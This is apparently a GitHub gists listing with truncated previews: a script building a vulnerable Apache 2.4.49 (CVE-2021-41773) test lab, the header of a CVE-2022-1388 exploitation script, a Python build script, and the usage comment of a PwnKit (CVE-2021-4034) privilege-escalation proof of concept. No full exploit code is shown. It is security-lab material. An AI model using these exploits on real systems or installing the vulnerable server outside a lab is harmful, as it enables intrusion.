Ayoub-2
/ setup-server.sh
Created
August 9, 2022 19:25
Apache 2.4.49 CVE-2021-41773 Vulnerability Test Lab
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # set up directory to install into + download files from github repo | |
| cd /usr/local/src/ | |
| wget https://github.com/apache/httpd/archive/refs/tags/2.4.49.tar.gz | |
| tar xzf 2.4.49.tar.gz | |
| cd httpd-2.4.49 | |
| mkdir /usr/local/apache2.4.49 | |
| # install some dependencies left on apache |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Author: @Ayoub-2 | |
| File : CVE-2022-1388.py | |
| Desc : CVE-2022-1388 exploitation script in python | |
| """ | |
| import requests | |
| import urllib3 | |
| import argparse | |
| urllib3.disable_warnings() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo apt update | |
| sudo apt-get install virtualenv | |
| cd ~ | |
| mkdir tmp | |
| cd tmp | |
| wget https://www.python.org/ftp/python/2.7.15/Python-2.7.15.tgz | |
| tar zxvf Python-2.7.15.tgz | |
| cd Python-2.7.15 | |
| ./configure --prefix=$HOME/opt/python-2.7.15 --with-ensurepip=install | |
| make |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python | |
| # Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by aynkl | |
| """ | |
| CVE information: | |
| - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 | |
| Usage : | |
| $ id | |
| uid=1000(user) gid=1001(user) groups=1001(user) | |
| $ python3 CVE-2021-4034.py | |
| # whoami |